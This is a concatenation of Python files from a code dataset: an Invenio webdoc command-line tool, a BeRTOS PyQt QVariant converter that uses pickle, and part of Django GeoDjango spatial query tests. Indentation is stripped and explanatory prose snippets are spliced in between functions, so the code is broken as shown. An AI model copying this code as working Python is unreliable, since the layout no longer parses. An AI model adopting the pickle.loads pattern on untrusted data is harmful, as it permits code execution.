f.close()
if verbose > 2:
print 'Written %s' % fullfilename
def get_mo_last_modification():
"""
Returns the timestamp of the most recently modified mo (compiled
po) file
"""
# Take one of the mo files. They are all installed at the same
# time, so last modification date should be the same
mo_file = '%s/share/locale/%s/LC_MESSAGES/invenio.mo' % (CFG_PREFIX, CFG_SITE_LANG)
if os.path.exists(os.path.abspath(mo_file)):
return os.stat(mo_file).st_mtime
else:
return 0
def filter_languages(text, ln='en', defined_tags=None):
"""
Filters the language tags that do not correspond to the specified language.
Eg: <lang><en>A book</en><de>Ein Buch</de></lang> will return
- with ln = 'de': "Ein Buch"
- with ln = 'en': "A book"
- with ln = 'fr': "A book"
Also replace variables such as <CFG_SITE_URL> and <CFG_SITE_NAME_INTL> inside
<lang><..><..></lang> tags in order to print them with the correct
language
@param text: the input text
@param ln: the language that is NOT filtered out from the input
@return: the input text as string with unnecessary languages filtered out
@see: bibformat_engine.py, from where this function was originally extracted
"""
# First define search_lang_tag(match) and clean_language_tag(match), used
# in re.sub() function
def search_lang_tag(match):
"""
Searches for the <lang>...</lang> tag and remove inner localized tags
such as <en>, <fr>, that are not current_lang.
If current_lang cannot be found inside <lang> ... </lang>, try to use 'CFG_SITE_LANG'
@param match: a match object corresponding to the special tag that must be interpreted
"""
current_lang = ln
# If <lang keep=all> is used, keep all empty lines (this is
# currently undocumented and behaviour might change)
keep = False
if match.group("keep") is not None:
keep = True
def clean_language_tag(match):
"""
Return tag text content if tag language of match is output language.
Called by substitution in 'filter_languages(...)'
@param match: a match object corresponding to the special tag that must be interpreted
"""
if match.group('lang') == current_lang or \
keep == True:
return match.group('translation')
else:
return ""
# End of clean_language_tag(..)
lang_tag_content = match.group("langs")
# Try to find a tag for the current lang. If it does not exist,
# then look for CFG_SITE_LANG. If that still does not exist, use
# 'en' as current_lang
pattern_current_lang = re.compile(r"<(" + current_lang + \
r")\s*>(.*?)(</"+current_lang+r"\s*>)",
re.IGNORECASE | re.DOTALL)
if re.search(pattern_current_lang, lang_tag_content) is None:
current_lang = CFG_SITE_LANG
# Can we find translation in 'CFG_SITE_LANG'?
if re.search(pattern_CFG_SITE_LANG, lang_tag_content) is None:
current_lang = 'en'
cleaned_lang_tag = ln_pattern.sub(clean_language_tag, lang_tag_content)
# Remove empty lines
# Only if 'keep' has not been set
if keep == False:
stripped_text = ''
for line in cleaned_lang_tag.splitlines(True):
if line.strip():
stripped_text += line
cleaned_lang_tag = stripped_text
return cleaned_lang_tag
# End of search_lang_tag(..)
filtered_text = pattern_lang.sub(search_lang_tag, text)
return filtered_text
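The behaviour described in the `filter_languages` docstring can be sketched with a minimal, self-contained re-implementation (the `demo_filter_languages` name is hypothetical, and it deliberately ignores the `keep=all` and `revision="..."` refinements handled above):

```python
import re

def demo_filter_languages(text, ln='en', default_ln='en'):
    """Minimal sketch of the <lang> filtering idea (hypothetical helper).

    Keeps only the requested language inside each <lang>...</lang>
    block, falling back to default_ln when ln has no translation.
    """
    lang_block = re.compile(r'<lang\s*>(?P<langs>.*?)</lang\s*>',
                            re.IGNORECASE | re.DOTALL)

    def pick_translation(match):
        content = match.group('langs')
        for candidate in (ln, default_ln):
            inner = re.search(r'<%s\s*>(.*?)</%s\s*>' % (candidate, candidate),
                              content, re.IGNORECASE | re.DOTALL)
            if inner:
                return inner.group(1)
        return ''

    return lang_block.sub(pick_translation, text)
```

With the docstring's own example, `demo_filter_languages('<lang><en>A book</en><de>Ein Buch</de></lang>', ln='de')` yields 'Ein Buch', while ln='fr' falls back to 'A book'.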
def usage(exitcode=1, msg=""):
"""Prints usage info."""
if msg:
sys.stderr.write("Error: %s.\n" % msg)
sys.stderr.write("Usage: %s [options] <webdocname>\n" % sys.argv[0])
sys.stderr.write(" -h, --help \t\t Print this help.\n")
sys.stderr.write(" -V, --version \t\t Print version information.\n")
sys.stderr.write(" -v, --verbose=LEVEL \t\t Verbose level (0=min,1=normal,9=max).\n")
sys.stderr.write(" -l, --language=LN1,LN2,.. \t\t Language(s) to process (default all)\n")
sys.stderr.write(" -m, --mode=MODE \t\t Update cache mode(0=Never,1=if necessary,2=always) (default 2)\n")
sys.stderr.write("\n")
sys.stderr.write(" Example: webdoc search-guide\n")
sys.stderr.write(" Example: webdoc -l en,fr search-guide\n")
sys.stderr.write(" Example: webdoc -m 1 search-guide")
sys.stderr.write("\n")
sys.exit(exitcode)
def main():
"""
main entry point for webdoc via command line
"""
options = {'language':CFG_SITE_LANGS, 'verbose':1, 'mode':2}
try:
opts, args = getopt.getopt(sys.argv[1:],
"hVv:l:m:",
["help",
"version",
"verbose=",
"language=",
"mode="])
except getopt.GetoptError, err:
usage(1, err)
try:
for opt in opts:
if opt[0] in ["-h", "--help"]:
usage(0)
elif opt[0] in ["-V", "--version"]:
print __revision__
sys.exit(0)
elif opt[0] in ["-v", "--verbose"]:
options["verbose"] = int(opt[1])
elif opt[0] in ["-l", "--language"]:
options["language"] = [wash_language(lang.strip().lower()) \
for lang in opt[1].split(',') \
if lang in CFG_SITE_LANGS]
elif opt[0] in ["-m", "--mode"]:
options["mode"] = opt[1]
except StandardError, e:
usage(e)
try:
options["mode"] = int(options["mode"])
except ValueError:
usage(1, "Mode must be an integer")
if len(args) > 0:
options["webdoc"] = args[0]
if not options.has_key("webdoc"):
usage(0)
# check if webdoc exists
infos = get_webdoc_info(options["webdoc"])
if infos[0] is None:
usage(1, "Could not find %s" % options["webdoc"])
update_webdoc_cache(webdoc=options["webdoc"],
mode=options["mode"],
verbose=options["verbose"],
languages=options["language"])
if __name__ == "__main__":
main()
| gpl-2.0 |
lucaotta/bertos | wizard/qvariant_converter_old.py | 7 | 3250 | #!/usr/bin/env python
# encoding: utf-8
#
# This file is part of BeRTOS.
#
# Bertos is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# As a special exception, you may use this file as part of a free software
# library without restriction. Specifically, if other files instantiate
# templates or use macros or inline functions from this file, or you compile
# this file and link it with other files to produce an executable, this
# file does not by itself cause the resulting executable to be covered by
# the GNU General Public License. This exception does not however
# invalidate any other reasons why the executable file might be covered by
# the GNU General Public License.
#
# Copyright 2008 Develer S.r.l. (http://www.develer.com/)
#
#
# Author: Lorenzo Berni <duplo@develer.com>
#
"""
Awful module for converting Python types to QVariant and back, to make the wizard compatible with older versions of PyQt (<= 4.4.3)
"""
from PyQt4.QtCore import *
import pickle
def getString(qvariant):
if type(qvariant) == str or type(qvariant) == unicode:
string = qvariant
else:
string = unicode(qvariant.toString())
return string
def convertString(string):
return QVariant(string)
def getStringList(qvariant):
string_list = []
if type(qvariant) == list:
string_list = qvariant
else:
for element in qvariant.toStringList():
string_list.append(unicode(element))
return string_list
def convertStringList(string_list):
result = []
for element in string_list:
result.append(QString(element))
return QVariant(QStringList(result))
def getStringDict(qvariant):
a = str(qvariant.toByteArray())
if len(a) == 0:
dict_str_str = {}
else:
dict_str_str = pickle.loads(a)
return dict_str_str
def convertStringDict(dict_str_str):
a = pickle.dumps(dict_str_str)
return QVariant(QByteArray(a))
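Stripped of the QVariant/QByteArray wrappers, the dict converters above all reduce to the same pickle round-trip; this sketch shows the idea with plain stdlib only (the sample dict is illustrative, no PyQt required):

```python
import pickle

# The dict converters serialize a {str: str} mapping to bytes and back,
# mirroring convertStringDict() (store) and getStringDict() (recover).
original = {'name': 'project', 'version': '1.0'}
blob = pickle.dumps(original)      # what convertStringDict() stores
restored = pickle.loads(blob)      # what getStringDict() recovers
assert restored == original
```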
def getBool(qvariant):
return qvariant.toBool()
def convertBool(boolean):
return QVariant(boolean)
def getBoolDict(qvariant):
a = str(qvariant.toByteArray())
if len(a) == 0:
dict_str_bool = {}
else:
dict_str_bool = pickle.loads(a)
return dict_str_bool
def convertBoolDict(dict_str_bool):
a = pickle.dumps(dict_str_bool)
return QVariant(QByteArray(a))
def getDict(qvariant):
a = str(qvariant.toByteArray())
if len(a) == 0:
dict_str_bool = {}
else:
dict_str_bool = pickle.loads(a)
return dict_str_bool
def convertDict(dict_str_variant):
a = pickle.dumps(dict_str_variant)
return QVariant(QByteArray(a))
| gpl-2.0 |
tjsavage/tmrwmedia | django/contrib/gis/tests/geoapp/tests.py | 36 | 35330 | import re, os, unittest
from django.db import connection
from django.contrib.gis import gdal
from django.contrib.gis.geos import *
from django.contrib.gis.measure import Distance
from django.contrib.gis.tests.utils import \
no_mysql, no_oracle, no_postgis, no_spatialite, \
mysql, oracle, postgis, spatialite
from django.test import TestCase
from models import Country, City, PennsylvaniaCity, State, Track
if not spatialite:
from models import Feature, MinusOneSRID
class GeoModelTest(TestCase):
def test01_fixtures(self):
"Testing geographic model initialization from fixtures."
# Ensuring that data was loaded from initial data fixtures.
self.assertEqual(2, Country.objects.count())
self.assertEqual(8, City.objects.count())
self.assertEqual(2, State.objects.count())
def test02_proxy(self):
"Testing Lazy-Geometry support (using the GeometryProxy)."
## Testing on a Point
pnt = Point(0, 0)
nullcity = City(name='NullCity', point=pnt)
nullcity.save()
# Making sure TypeError is thrown when trying to set with an
# incompatible type.
for bad in [5, 2.0, LineString((0, 0), (1, 1))]:
try:
nullcity.point = bad
except TypeError:
pass
else:
self.fail('Should throw a TypeError')
# Now setting with a compatible GEOS Geometry, saving, and ensuring
# the save took, notice no SRID is explicitly set.
new = Point(5, 23)
nullcity.point = new
# Ensuring that the SRID is automatically set to that of the
# field after assignment, but before saving.
self.assertEqual(4326, nullcity.point.srid)
nullcity.save()
# Ensuring the point was saved correctly after saving
self.assertEqual(new, City.objects.get(name='NullCity').point)
# Setting the X and Y of the Point
nullcity.point.x = 23
nullcity.point.y = 5
# Checking assignments pre & post-save.
self.assertNotEqual(Point(23, 5), City.objects.get(name='NullCity').point)
nullcity.save()
self.assertEqual(Point(23, 5), City.objects.get(name='NullCity').point)
nullcity.delete()
## Testing on a Polygon
shell = LinearRing((0, 0), (0, 100), (100, 100), (100, 0), (0, 0))
inner = LinearRing((40, 40), (40, 60), (60, 60), (60, 40), (40, 40))
# Creating a State object using a built Polygon
ply = Polygon(shell, inner)
nullstate = State(name='NullState', poly=ply)
self.assertEqual(4326, nullstate.poly.srid) # SRID auto-set from None
nullstate.save()
ns = State.objects.get(name='NullState')
self.assertEqual(ply, ns.poly)
# Testing the `ogr` and `srs` lazy-geometry properties.
if gdal.HAS_GDAL:
self.assertEqual(True, isinstance(ns.poly.ogr, gdal.OGRGeometry))
self.assertEqual(ns.poly.wkb, ns.poly.ogr.wkb)
self.assertEqual(True, isinstance(ns.poly.srs, gdal.SpatialReference))
self.assertEqual('WGS 84', ns.poly.srs.name)
# Changing the interior ring on the poly attribute.
new_inner = LinearRing((30, 30), (30, 70), (70, 70), (70, 30), (30, 30))
ns.poly[1] = new_inner
ply[1] = new_inner
self.assertEqual(4326, ns.poly.srid)
ns.save()
self.assertEqual(ply, State.objects.get(name='NullState').poly)
ns.delete()
def test03a_kml(self):
"Testing KML output from the database using GeoQuerySet.kml()."
# Only PostGIS supports KML serialization
if not postgis:
self.assertRaises(NotImplementedError, State.objects.all().kml, field_name='poly')
return
# Should throw a TypeError when trying to obtain KML from a
# non-geometry field.
qs = City.objects.all()
self.assertRaises(TypeError, qs.kml, 'name')
# The reference KML depends on the version of PostGIS used
# (the output stopped including altitude in 1.3.3).
if connection.ops.spatial_version >= (1, 3, 3):
ref_kml = '<Point><coordinates>-104.609252,38.255001</coordinates></Point>'
else:
ref_kml = '<Point><coordinates>-104.609252,38.255001,0</coordinates></Point>'
# Ensuring the KML is as expected.
ptown1 = City.objects.kml(field_name='point', precision=9).get(name='Pueblo')
ptown2 = City.objects.kml(precision=9).get(name='Pueblo')
for ptown in [ptown1, ptown2]:
self.assertEqual(ref_kml, ptown.kml)
def test03b_gml(self):
"Testing GML output from the database using GeoQuerySet.gml()."
if mysql or spatialite:
self.assertRaises(NotImplementedError, Country.objects.all().gml, field_name='mpoly')
return
# Should throw a TypeError when trying to obtain GML from a
# non-geometry field.
qs = City.objects.all()
self.assertRaises(TypeError, qs.gml, field_name='name')
ptown1 = City.objects.gml(field_name='point', precision=9).get(name='Pueblo')
ptown2 = City.objects.gml(precision=9).get(name='Pueblo')
if oracle:
# No precision parameter for Oracle :-/
gml_regex = re.compile(r'^<gml:Point srsName="SDO:4326" xmlns:gml="http://www.opengis.net/gml"><gml:coordinates decimal="\." cs="," ts=" ">-104.60925\d+,38.25500\d+ </gml:coordinates></gml:Point>')
for ptown in [ptown1, ptown2]:
self.assertTrue(gml_regex.match(ptown.gml))
else:
gml_regex = re.compile(r'^<gml:Point srsName="EPSG:4326"><gml:coordinates>-104\.60925\d+,38\.255001</gml:coordinates></gml:Point>')
for ptown in [ptown1, ptown2]:
self.assertTrue(gml_regex.match(ptown.gml))
def test03c_geojson(self):
"Testing GeoJSON output from the database using GeoQuerySet.geojson()."
# Only PostGIS 1.3.4+ supports GeoJSON.
if not connection.ops.geojson:
self.assertRaises(NotImplementedError, Country.objects.all().geojson, field_name='mpoly')
return
if connection.ops.spatial_version >= (1, 4, 0):
pueblo_json = '{"type":"Point","coordinates":[-104.609252,38.255001]}'
houston_json = '{"type":"Point","crs":{"type":"name","properties":{"name":"EPSG:4326"}},"coordinates":[-95.363151,29.763374]}'
victoria_json = '{"type":"Point","bbox":[-123.30519600,48.46261100,-123.30519600,48.46261100],"coordinates":[-123.305196,48.462611]}'
chicago_json = '{"type":"Point","crs":{"type":"name","properties":{"name":"EPSG:4326"}},"bbox":[-87.65018,41.85039,-87.65018,41.85039],"coordinates":[-87.65018,41.85039]}'
else:
pueblo_json = '{"type":"Point","coordinates":[-104.60925200,38.25500100]}'
houston_json = '{"type":"Point","crs":{"type":"EPSG","properties":{"EPSG":4326}},"coordinates":[-95.36315100,29.76337400]}'
victoria_json = '{"type":"Point","bbox":[-123.30519600,48.46261100,-123.30519600,48.46261100],"coordinates":[-123.30519600,48.46261100]}'
chicago_json = '{"type":"Point","crs":{"type":"EPSG","properties":{"EPSG":4326}},"bbox":[-87.65018,41.85039,-87.65018,41.85039],"coordinates":[-87.65018,41.85039]}'
# Precision argument should only be an integer
self.assertRaises(TypeError, City.objects.geojson, precision='foo')
# Reference queries and values.
# SELECT ST_AsGeoJson("geoapp_city"."point", 8, 0) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Pueblo';
self.assertEqual(pueblo_json, City.objects.geojson().get(name='Pueblo').geojson)
# 1.3.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 1) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Houston';
# 1.4.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 2) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Houston';
# This time we want to include the CRS by using the `crs` keyword.
self.assertEqual(houston_json, City.objects.geojson(crs=True, model_att='json').get(name='Houston').json)
# 1.3.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 2) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Victoria';
# 1.4.x: SELECT ST_AsGeoJson("geoapp_city"."point", 8, 1) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Victoria';
# This time we include the bounding box by using the `bbox` keyword.
self.assertEqual(victoria_json, City.objects.geojson(bbox=True).get(name='Victoria').geojson)
# 1.(3|4).x: SELECT ST_AsGeoJson("geoapp_city"."point", 5, 3) FROM "geoapp_city" WHERE "geoapp_city"."name" = 'Chicago';
# Finally, we set every available keyword.
self.assertEqual(chicago_json, City.objects.geojson(bbox=True, crs=True, precision=5).get(name='Chicago').geojson)
def test03d_svg(self):
"Testing SVG output using GeoQuerySet.svg()."
if mysql or oracle:
self.assertRaises(NotImplementedError, City.objects.svg)
return
self.assertRaises(TypeError, City.objects.svg, precision='foo')
# SELECT AsSVG(geoapp_city.point, 0, 8) FROM geoapp_city WHERE name = 'Pueblo';
svg1 = 'cx="-104.609252" cy="-38.255001"'
# With only one point, the relative output is practically identical except
# for the 'c' letter prefix on the x,y values.
svg2 = svg1.replace('c', '')
self.assertEqual(svg1, City.objects.svg().get(name='Pueblo').svg)
self.assertEqual(svg2, City.objects.svg(relative=5).get(name='Pueblo').svg)
@no_mysql
def test04_transform(self):
"Testing the transform() GeoManager method."
# Pre-transformed points for Houston and Pueblo.
htown = fromstr('POINT(1947516.83115183 6322297.06040572)', srid=3084)
ptown = fromstr('POINT(992363.390841912 481455.395105533)', srid=2774)
prec = 3 # Precision is low due to version variations in PROJ and GDAL.
# Asserting the result of the transform operation with the values in
# the pre-transformed points. Oracle does not have the 3084 SRID.
if not oracle:
h = City.objects.transform(htown.srid).get(name='Houston')
self.assertEqual(3084, h.point.srid)
self.assertAlmostEqual(htown.x, h.point.x, prec)
self.assertAlmostEqual(htown.y, h.point.y, prec)
p1 = City.objects.transform(ptown.srid, field_name='point').get(name='Pueblo')
p2 = City.objects.transform(srid=ptown.srid).get(name='Pueblo')
for p in [p1, p2]:
self.assertEqual(2774, p.point.srid)
self.assertAlmostEqual(ptown.x, p.point.x, prec)
self.assertAlmostEqual(ptown.y, p.point.y, prec)
@no_mysql
@no_spatialite # SpatiaLite does not have an Extent function
def test05_extent(self):
"Testing the `extent` GeoQuerySet method."
# Reference query:
# `SELECT ST_extent(point) FROM geoapp_city WHERE (name='Houston' or name='Dallas');`
# => BOX(-96.8016128540039 29.7633724212646,-95.3631439208984 32.7820587158203)
expected = (-96.8016128540039, 29.7633724212646, -95.3631439208984, 32.782058715820)
qs = City.objects.filter(name__in=('Houston', 'Dallas'))
extent = qs.extent()
for val, exp in zip(extent, expected):
self.assertAlmostEqual(exp, val, 4)
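For reference, the `ST_Extent` aggregate checked above reduces to a min/max fold over coordinates. A minimal pure-Python sketch, independent of any spatial backend (the function name is illustrative, not a GeoDjango API):

```python
def extent(points):
    """Return (xmin, ymin, xmax, ymax) for an iterable of (x, y) pairs."""
    xs = [p[0] for p in points]
    ys = [p[1] for p in points]
    return (min(xs), min(ys), max(xs), max(ys))

# Houston and Dallas, using the coordinates from the reference query above.
box = extent([(-95.3631439208984, 29.7633724212646),
              (-96.8016128540039, 32.7820587158203)])
```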
# Only PostGIS has support for the MakeLine aggregate.
@no_mysql
@no_oracle
@no_spatialite
def test06_make_line(self):
"Testing the `make_line` GeoQuerySet method."
# Ensuring that a `TypeError` is raised on models without PointFields.
self.assertRaises(TypeError, State.objects.make_line)
self.assertRaises(TypeError, Country.objects.make_line)
# Reference query:
# SELECT AsText(ST_MakeLine(geoapp_city.point)) FROM geoapp_city;
ref_line = GEOSGeometry('LINESTRING(-95.363151 29.763374,-96.801611 32.782057,-97.521157 34.464642,174.783117 -41.315268,-104.609252 38.255001,-95.23506 38.971823,-87.650175 41.850385,-123.305196 48.462611)', srid=4326)
self.assertEqual(ref_line, City.objects.make_line())
@no_mysql
def test09_disjoint(self):
"Testing the `disjoint` lookup type."
ptown = City.objects.get(name='Pueblo')
qs1 = City.objects.filter(point__disjoint=ptown.point)
self.assertEqual(7, qs1.count())
qs2 = State.objects.filter(poly__disjoint=ptown.point)
self.assertEqual(1, qs2.count())
self.assertEqual('Kansas', qs2[0].name)
def test10_contains_contained(self):
"Testing the 'contained', 'contains', and 'bbcontains' lookup types."
# Getting Texas, yes we were a country -- once ;)
texas = Country.objects.get(name='Texas')
# Seeing what cities are in Texas, should get Houston and Dallas,
# and Oklahoma City because 'contained' only checks on the
# _bounding box_ of the Geometries.
if not oracle:
qs = City.objects.filter(point__contained=texas.mpoly)
self.assertEqual(3, qs.count())
cities = ['Houston', 'Dallas', 'Oklahoma City']
for c in qs: self.assertEqual(True, c.name in cities)
# Pulling out some cities.
houston = City.objects.get(name='Houston')
wellington = City.objects.get(name='Wellington')
pueblo = City.objects.get(name='Pueblo')
okcity = City.objects.get(name='Oklahoma City')
lawrence = City.objects.get(name='Lawrence')
# Now testing contains on the countries using the points for
# Houston and Wellington.
tx = Country.objects.get(mpoly__contains=houston.point) # Query w/GEOSGeometry
nz = Country.objects.get(mpoly__contains=wellington.point.hex) # Query w/EWKBHEX
self.assertEqual('Texas', tx.name)
self.assertEqual('New Zealand', nz.name)
# Spatialite 2.3 thinks that Lawrence is in Puerto Rico (a NULL geometry).
if not spatialite:
ks = State.objects.get(poly__contains=lawrence.point)
self.assertEqual('Kansas', ks.name)
# Pueblo and Oklahoma City (even though OK City is within the bounding box of Texas)
# are not contained in Texas or New Zealand.
self.assertEqual(0, len(Country.objects.filter(mpoly__contains=pueblo.point))) # Query w/GEOSGeometry object
self.assertEqual((mysql and 1) or 0,
len(Country.objects.filter(mpoly__contains=okcity.point.wkt))) # Query w/WKT
# OK City is contained w/in bounding box of Texas.
if not oracle:
qs = Country.objects.filter(mpoly__bbcontains=okcity.point)
self.assertEqual(1, len(qs))
self.assertEqual('Texas', qs[0].name)
@no_mysql
def test11_lookup_insert_transform(self):
"Testing automatic transform for lookups and inserts."
# San Antonio in 'WGS84' (SRID 4326)
sa_4326 = 'POINT (-98.493183 29.424170)'
wgs_pnt = fromstr(sa_4326, srid=4326) # Our reference point in WGS84
# Oracle doesn't have SRID 3084, using 41157.
if oracle:
# San Antonio in 'Texas 4205, Southern Zone (1983, meters)' (SRID 41157)
# Used the following Oracle SQL to get this value:
# SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_CS.TRANSFORM(SDO_GEOMETRY('POINT (-98.493183 29.424170)', 4326), 41157)) FROM DUAL;
nad_wkt = 'POINT (300662.034646583 5416427.45974934)'
nad_srid = 41157
else:
# San Antonio in 'NAD83(HARN) / Texas Centric Lambert Conformal' (SRID 3084)
nad_wkt = 'POINT (1645978.362408288754523 6276356.025927528738976)' # Used ogr.py in gdal 1.4.1 for this transform
nad_srid = 3084
# Constructing & querying with a point from a different SRID. Oracle
# `SDO_OVERLAPBDYINTERSECT` operates differently from
# `ST_Intersects`, so contains is used instead.
nad_pnt = fromstr(nad_wkt, srid=nad_srid)
if oracle:
tx = Country.objects.get(mpoly__contains=nad_pnt)
else:
tx = Country.objects.get(mpoly__intersects=nad_pnt)
self.assertEqual('Texas', tx.name)
# Creating San Antonio. Remember the Alamo.
sa = City.objects.create(name='San Antonio', point=nad_pnt)
# Now verifying that San Antonio was transformed correctly
sa = City.objects.get(name='San Antonio')
self.assertAlmostEqual(wgs_pnt.x, sa.point.x, 6)
self.assertAlmostEqual(wgs_pnt.y, sa.point.y, 6)
# If the GeometryField SRID is -1, then we shouldn't perform any
# transformation if the SRID of the input geometry is different.
# SpatiaLite does not support missing SRID values.
if not spatialite:
m1 = MinusOneSRID(geom=Point(17, 23, srid=4326))
m1.save()
self.assertEqual(-1, m1.geom.srid)
@no_mysql
def test12_null_geometries(self):
"Testing NULL geometry support, and the `isnull` lookup type."
# Creating a state with a NULL boundary.
State.objects.create(name='Puerto Rico')
# Querying for both NULL and Non-NULL values.
nullqs = State.objects.filter(poly__isnull=True)
validqs = State.objects.filter(poly__isnull=False)
# Puerto Rico should be NULL (it's a commonwealth unincorporated territory)
self.assertEqual(1, len(nullqs))
self.assertEqual('Puerto Rico', nullqs[0].name)
# The valid states should be Colorado & Kansas
self.assertEqual(2, len(validqs))
state_names = [s.name for s in validqs]
self.assertEqual(True, 'Colorado' in state_names)
self.assertEqual(True, 'Kansas' in state_names)
# Saving another commonwealth w/a NULL geometry.
nmi = State.objects.create(name='Northern Mariana Islands', poly=None)
self.assertEqual(nmi.poly, None)
# Assigning a geometry and saving -- then UPDATE back to NULL.
nmi.poly = 'POLYGON((0 0,1 0,1 1,1 0,0 0))'
nmi.save()
State.objects.filter(name='Northern Mariana Islands').update(poly=None)
self.assertEqual(None, State.objects.get(name='Northern Mariana Islands').poly)
# Only PostGIS has `left` and `right` lookup types.
@no_mysql
@no_oracle
@no_spatialite
def test13_left_right(self):
"Testing the 'left' and 'right' lookup types."
# Left: A << B => true if xmax(A) < xmin(B)
# Right: A >> B => true if xmin(A) > xmax(B)
# See: BOX2D_left() and BOX2D_right() in lwgeom_box2dfloat4.c in PostGIS source.
# Getting the borders for Colorado & Kansas
co_border = State.objects.get(name='Colorado').poly
ks_border = State.objects.get(name='Kansas').poly
# Note: Wellington has an 'X' value of 174, so it will not be considered
# to the left of CO.
# These cities should be strictly to the right of the CO border.
cities = ['Houston', 'Dallas', 'Oklahoma City',
'Lawrence', 'Chicago', 'Wellington']
qs = City.objects.filter(point__right=co_border)
self.assertEqual(6, len(qs))
for c in qs: self.assertEqual(True, c.name in cities)
# These cities should be strictly to the right of the KS border.
cities = ['Chicago', 'Wellington']
qs = City.objects.filter(point__right=ks_border)
self.assertEqual(2, len(qs))
for c in qs: self.assertEqual(True, c.name in cities)
vic = City.objects.get(point__left=co_border)
self.assertEqual('Victoria', vic.name)
cities = ['Pueblo', 'Victoria']
qs = City.objects.filter(point__left=ks_border)
self.assertEqual(2, len(qs))
for c in qs: self.assertEqual(True, c.name in cities)
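The PostGIS `<<` (left) and `>>` (right) operators exercised above compare bounding boxes only. A hedged sketch of the two predicates over `(xmin, ymin, xmax, ymax)` extent tuples (function names and the rough boxes are illustrative, not PostGIS source):

```python
def strictly_left(a, b):
    # a << b: A's box ends before B's box begins on the x axis.
    return a[2] < b[0]

def strictly_right(a, b):
    # a >> b: A's box begins after B's box ends on the x axis.
    return a[0] > b[2]

# Rough boxes: Colorado spans roughly x in [-109, -102]; Wellington
# (x = 174) falls strictly to its right, Victoria (x = -123.3) to its left.
co = (-109.0, 37.0, -102.0, 41.0)
wellington = (174.78, -41.32, 174.78, -41.32)
victoria = (-123.31, 48.46, -123.31, 48.46)
```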
def test14_equals(self):
"Testing the 'same_as' and 'equals' lookup types."
pnt = fromstr('POINT (-95.363151 29.763374)', srid=4326)
c1 = City.objects.get(point=pnt)
c2 = City.objects.get(point__same_as=pnt)
c3 = City.objects.get(point__equals=pnt)
for c in [c1, c2, c3]: self.assertEqual('Houston', c.name)
@no_mysql
def test15_relate(self):
"Testing the 'relate' lookup type."
# To make things more interesting, we will have our Texas reference point in
# different SRIDs.
pnt1 = fromstr('POINT (649287.0363174 4177429.4494686)', srid=2847)
pnt2 = fromstr('POINT(-98.4919715741052 29.4333344025053)', srid=4326)
# Not passing in a geometry as the first param should
# raise a ValueError when initializing the GeoQuerySet
self.assertRaises(ValueError, Country.objects.filter, mpoly__relate=(23, 'foo'))
# Making sure the right exception is raised for the given
# bad arguments.
for bad_args, e in [((pnt1, 0), ValueError), ((pnt2, 'T*T***FF*', 0), ValueError)]:
qs = Country.objects.filter(mpoly__relate=bad_args)
self.assertRaises(e, qs.count)
# Relate works differently for the different backends.
if postgis or spatialite:
contains_mask = 'T*T***FF*'
within_mask = 'T*F**F***'
intersects_mask = 'T********'
elif oracle:
contains_mask = 'contains'
within_mask = 'inside'
# TODO: This is not quite the same as the PostGIS mask above
intersects_mask = 'overlapbdyintersect'
# Testing contains relation mask.
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt1, contains_mask)).name)
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt2, contains_mask)).name)
# Testing within relation mask.
ks = State.objects.get(name='Kansas')
self.assertEqual('Lawrence', City.objects.get(point__relate=(ks.poly, within_mask)).name)
# Testing intersection relation mask.
if not oracle:
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt1, intersects_mask)).name)
self.assertEqual('Texas', Country.objects.get(mpoly__relate=(pnt2, intersects_mask)).name)
self.assertEqual('Lawrence', City.objects.get(point__relate=(ks.poly, intersects_mask)).name)
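The PostGIS/SpatiaLite masks above are DE-9IM patterns: nine characters, one per cell of the intersection matrix, where 'T' accepts any non-empty intersection, 'F' requires an empty one, '*' matches anything, and a digit requires that exact dimension. A minimal matcher sketch (illustrative, not Django or GEOS code):

```python
def de9im_match(matrix, mask):
    """Check a 9-char DE-9IM intersection matrix against a pattern mask."""
    assert len(matrix) == 9 and len(mask) == 9
    for cell, pat in zip(matrix, mask):
        if pat == '*':
            continue                      # wildcard: any value allowed
        if pat == 'T' and cell == 'F':
            return False                  # required non-empty, got empty
        if pat == 'F' and cell != 'F':
            return False                  # required empty, got non-empty
        if pat in '012' and cell != pat:
            return False                  # exact dimension required
    return True
```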
def test16_createnull(self):
"Testing creating a model instance and the geometry being None"
c = City()
self.assertEqual(c.point, None)
@no_mysql
def test17_unionagg(self):
"Testing the `unionagg` (aggregate union) GeoManager method."
tx = Country.objects.get(name='Texas').mpoly
# Houston, Dallas -- Oracle has different order.
union1 = fromstr('MULTIPOINT(-96.801611 32.782057,-95.363151 29.763374)')
union2 = fromstr('MULTIPOINT(-95.363151 29.763374,-96.801611 32.782057)')
qs = City.objects.filter(point__within=tx)
self.assertRaises(TypeError, qs.unionagg, 'name')
# Using `field_name` keyword argument in one query and specifying an
# order in the other (which should not be used because this is
# an aggregate method on a spatial column)
u1 = qs.unionagg(field_name='point')
u2 = qs.order_by('name').unionagg()
tol = 0.00001
if oracle:
union = union2
else:
union = union1
self.assertEqual(True, union.equals_exact(u1, tol))
self.assertEqual(True, union.equals_exact(u2, tol))
qs = City.objects.filter(name='NotACity')
self.assertEqual(None, qs.unionagg(field_name='point'))
@no_spatialite # SpatiaLite does not support abstract geometry columns
def test18_geometryfield(self):
"Testing the general GeometryField."
Feature(name='Point', geom=Point(1, 1)).save()
Feature(name='LineString', geom=LineString((0, 0), (1, 1), (5, 5))).save()
Feature(name='Polygon', geom=Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0)))).save()
